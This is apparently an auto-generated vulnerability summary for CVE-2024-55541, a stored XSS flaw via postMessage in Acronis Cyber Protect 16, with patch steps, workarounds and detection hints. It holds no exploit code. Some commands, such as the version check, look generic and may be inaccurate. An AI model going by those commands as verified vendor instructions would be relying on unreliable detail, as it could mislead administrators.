CVE-2024-55541
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Acronis Cyber Protect 16 allows attackers to inject malicious scripts via postMessage without proper origin validation. When exploited, this could enable session hijacking, credential theft, or unauthorized actions within the application. All users of Acronis Cyber Protect 16 before build 39169 on Linux and Windows are affected.
💻 Affected Systems
- Acronis Cyber Protect 16
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete account takeover, data exfiltration, or ransomware deployment through authenticated user sessions
Likely Case
Session hijacking, credential theft, or unauthorized administrative actions within the application
If Mitigated
Limited impact with proper network segmentation and user privilege restrictions
🎯 Exploit Status
Requires user interaction or access to inject malicious payload via postMessage
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Build 39169 or later
Vendor Advisory: https://security-advisory.acronis.com/advisories/SEC-3647
Restart Required: Yes
Instructions:
1. Download Acronis Cyber Protect 16 build 39169 or later from official Acronis portal
2. Backup current configuration
3. Install the update following Acronis documentation
4. Restart the Acronis Cyber Protect service
5. Verify successful update in management console
🔧 Temporary Workarounds
Content Security Policy (CSP) Implementation
allImplement strict CSP headers to restrict script execution sources
Add CSP headers to web server configuration: Content-Security-Policy: script-src 'self'
Network Segmentation
allRestrict access to Acronis management interface to trusted networks only
Configure firewall rules to limit access to Acronis ports (e.g., 9876, 443) to authorized IPs only
🧯 If You Can't Patch
- Implement strict network segmentation to isolate Acronis management interface from untrusted networks
- Enable multi-factor authentication and enforce least privilege access controls for all user accounts
🔍 How to Verify
Check if Vulnerable:
Check Acronis Cyber Protect version in management console or via command: acronis_cyber_protect --versionCheck Version:
acronis_cyber_protect --versionVerify Fix Applied:
Verify version shows build 39169 or higher in management console📡 Detection & Monitoring
Log Indicators:
- Unusual postMessage events in application logs
- Multiple failed authentication attempts followed by successful login
Network Indicators:
- Unusual outbound connections from Acronis server
- Suspicious JavaScript payloads in HTTP traffic
SIEM Query:
source="acronis_logs" AND (event="postMessage" OR event="xss_attempt")